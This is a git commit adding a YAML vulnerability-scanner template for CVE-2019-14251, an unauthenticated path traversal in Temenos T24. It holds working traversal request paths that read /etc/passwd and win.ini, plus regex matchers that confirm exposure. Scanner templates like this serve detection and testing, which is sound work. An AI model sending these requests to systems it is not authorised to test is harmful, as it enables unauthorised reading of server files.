Create CVE-2019-14251.yaml
parent
d878069f29
commit
c9ff638860
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2019-14251
|
||||
|
||||
info:
|
||||
name: T24 in TEMENOS Channels R15.01 - Pre Authenticated Path Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: An unauthenticated path traversal vulnerability was discovered permitting an attacker to exfiltrate data directly from the T24 web server.
|
||||
reference:
|
||||
- https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt
|
||||
- https://www.cvedetails.com/cve/CVE-2019-14251
|
||||
- https://vuldb.com/?id.146815
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2019-14251
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2019,temenos,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd&"
|
||||
- "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- "for 16-bit app support"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue